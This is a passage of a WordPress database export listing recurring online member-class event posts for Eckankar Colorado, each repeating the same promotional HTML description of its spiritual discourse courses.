lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','ONLINE Member Class - Soul Travel 2','','publish','closed','closed','','letters-of-light-and-sound-2-2021-01-03','','','2019-12-18 14:32:57','2019-12-18 21:32:57','',225018,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-01-03#038;p=225018',0,'tribe_events','',0),(263247,2,'2019-12-18 14:32:57','2019-12-18 21:32:57','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"Soul Travel 2 – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','ONLINE Member Class - Soul Travel 2','','publish','closed','closed','','letters-of-light-and-sound-2-2021-02-07','','','2019-12-18 14:32:57','2019-12-18 21:32:57','',225018,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-02-07#038;p=225018',0,'tribe_events','',0),(263248,2,'2019-12-18 14:32:57','2019-12-18 21:32:57','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"Soul Travel 2 – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','ONLINE Member Class - Soul Travel 2','','publish','closed','closed','','letters-of-light-and-sound-2-2021-03-07','','','2019-12-18 14:32:57','2019-12-18 21:32:57','',225018,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-03-07#038;p=225018',0,'tribe_events','',0),(263249,2,'2019-12-18 14:32:57','2019-12-18 21:32:57','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"Soul Travel 2 – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','ONLINE Member Class - Soul Travel 2','','publish','closed','closed','','letters-of-light-and-sound-2-2021-04-04','','','2019-12-18 14:32:57','2019-12-18 21:32:57','',225018,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-04-04#038;p=225018',0,'tribe_events','',0),(263250,2,'2019-12-18 14:32:57','2019-12-18 21:32:57','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"Soul Travel 2 – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','ONLINE Member Class - Soul Travel 2','','publish','closed','closed','','letters-of-light-and-sound-2-2021-05-02','','','2019-12-18 14:32:57','2019-12-18 21:32:57','',225018,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-05-02#038;p=225018',0,'tribe_events','',0),(263251,2,'2019-12-18 14:32:57','2019-12-18 21:32:57','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"Soul Travel 2 – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','ONLINE Member Class - Soul Travel 2','','publish','closed','closed','','letters-of-light-and-sound-2-2021-06-06','','','2019-12-18 14:32:57','2019-12-18 21:32:57','',225018,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-06-06#038;p=225018',0,'tribe_events','',0),(263252,2,'2019-12-18 14:32:57','2019-12-18 21:32:57','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"Soul Travel 2 – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','ONLINE Member Class - Soul Travel 2','','publish','closed','closed','','letters-of-light-and-sound-2-2021-07-04','','','2019-12-18 14:32:57','2019-12-18 21:32:57','',225018,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-07-04#038;p=225018',0,'tribe_events','',0),(263253,2,'2019-12-18 14:32:57','2019-12-18 21:32:57','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"Soul Travel 2 – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','ONLINE Member Class - Soul Travel 2','','publish','closed','closed','','letters-of-light-and-sound-2-2021-08-01','','','2019-12-18 14:32:57','2019-12-18 21:32:57','',225018,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-08-01#038;p=225018',0,'tribe_events','',0),(263254,2,'2019-12-18 14:32:57','2019-12-18 21:32:57','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"Soul Travel 2 – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','ONLINE Member Class - Soul Travel 2','','publish','closed','closed','','letters-of-light-and-sound-2-2021-09-05','','','2019-12-18 14:32:57','2019-12-18 21:32:57','',225018,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-09-05#038;p=225018',0,'tribe_events','',0),(263255,2,'2019-12-18 14:32:57','2019-12-18 21:32:57','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"Soul Travel 2 – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','ONLINE Member Class - Soul Travel 2','','publish','closed','closed','','letters-of-light-and-sound-2-2021-10-03','','','2019-12-18 14:32:57','2019-12-18 21:32:57','',225018,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-10-03#038;p=225018',0,'tribe_events','',0),(263256,2,'2019-12-18 14:32:57','2019-12-18 21:32:57','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"Soul Travel 2 – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','ONLINE Member Class - Soul Travel 2','','publish','closed','closed','','letters-of-light-and-sound-2-2021-11-07','','','2019-12-18 14:32:57','2019-12-18 21:32:57','',225018,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-11-07#038;p=225018',0,'tribe_events','',0),(263286,2,'2021-01-14 12:55:01','2021-01-14 19:55:01','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The ECK Dream 2 Discourses\"</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','ONLINE Member Class - The ECK Dream 2 Discourses','','publish','closed','closed','','online-member-class-the-eck-satsang-discourse-second-series-2021-02-15','','','2021-01-14 14:35:25','2021-01-14 21:35:25','',263232,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-02-15#038;p=263232',0,'tribe_events','',0),(263319,2,'2021-01-14 13:13:01','2021-01-14 20:13:01','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"TEMPLATE\"</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','ONLINE Member Class - TEMPLATE','','publish','closed','closed','','online-member-class-template','','','2021-01-14 13:13:01','2021-01-14 20:13:01','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=263319',0,'tribe_events','',0),(263321,2,'2021-01-14 13:16:52','2021-01-14 20:16:52','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The ECK Satsang Discourse - Second Series\"</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','ONLINE Member Class - The ECK Satsang Discourse - Second Series','','publish','closed','closed','','online-member-class-the-eck-satsang-discourse-second-series-2','','','2021-01-14 13:20:20','2021-01-14 20:20:20','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=263321',0,'tribe_events','',0),(263323,2,'2021-01-14 13:16:52','2021-01-14 20:16:52','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The ECK Satsang Discourse - Second Series\"</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','ONLINE Member Class - The ECK Satsang Discourse - Second Series','','publish','closed','closed','','online-member-class-the-eck-satsang-discourse-second-series-2-2020-12-14','','','2021-01-14 13:20:20','2021-01-14 20:20:20','',263321,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2020-12-14#038;p=263321',0,'tribe_events','',0),(263324,2,'2021-01-14 13:16:52','2021-01-14 20:16:52','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The ECK Satsang Discourse - Second Series\"</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','ONLINE Member Class - The ECK Satsang Discourse - Second Series','','publish','closed','closed','','online-member-class-the-eck-satsang-discourse-second-series-2-2021-01-11','','','2021-01-14 13:20:20','2021-01-14 20:20:20','',263321,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-01-11#038;p=263321',0,'tribe_events','',0),(263325,2,'2021-01-14 13:16:52','2021-01-14 20:16:52','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The ECK Satsang Discourse - Second Series\"</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','ONLINE Member Class - The ECK Satsang Discourse - Second Series','','publish','closed','closed','','online-member-class-the-eck-satsang-discourse-second-series-2-2021-02-08','','','2021-01-14 13:20:20','2021-01-14 20:20:20','',263321,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-02-08#038;p=263321',0,'tribe_events','',0),(263326,2,'2021-01-14 13:16:52','2021-01-14 20:16:52','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The ECK Satsang Discourse - Second Series\"</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','ONLINE Member Class - The ECK Satsang Discourse - Second Series','','publish','closed','closed','','online-member-class-the-eck-satsang-discourse-second-series-2-2021-03-08','','','2021-01-14 13:20:20','2021-01-14 20:20:20','',263321,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-03-08#038;p=263321',0,'tribe_events','',0),(263327,2,'2021-01-14 13:16:52','2021-01-14 20:16:52','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The ECK Satsang Discourse - Second Series\"</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','ONLINE Member Class - The ECK Satsang Discourse - Second Series','','publish','closed','closed','','online-member-class-the-eck-satsang-discourse-second-series-2-2021-04-12','','','2021-01-14 13:20:21','2021-01-14 20:20:21','',263321,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-04-12#038;p=263321',0,'tribe_events','',0),(263328,2,'2021-01-14 13:16:52','2021-01-14 20:16:52','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The ECK Satsang Discourse - Second Series\"</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','ONLINE Member Class - The ECK Satsang Discourse - Second Series','','publish','closed','closed','','online-member-class-the-eck-satsang-discourse-second-series-2-2021-05-10','','','2021-01-14 13:20:21','2021-01-14 20:20:21','',263321,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-05-10#038;p=263321',0,'tribe_events','',0),(263329,2,'2021-01-14 13:16:52','2021-01-14 20:16:52','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The ECK Satsang Discourse - Second Series\"</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','ONLINE Member Class - The ECK Satsang Discourse - Second Series','','publish','closed','closed','','online-member-class-the-eck-satsang-discourse-second-series-2-2021-06-14','','','2021-01-14 13:20:21','2021-01-14 20:20:21','',263321,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-06-14#038;p=263321',0,'tribe_events','',0),(263330,2,'2021-01-14 13:16:52','2021-01-14 20:16:52','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The ECK Satsang Discourse - Second Series\"</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one 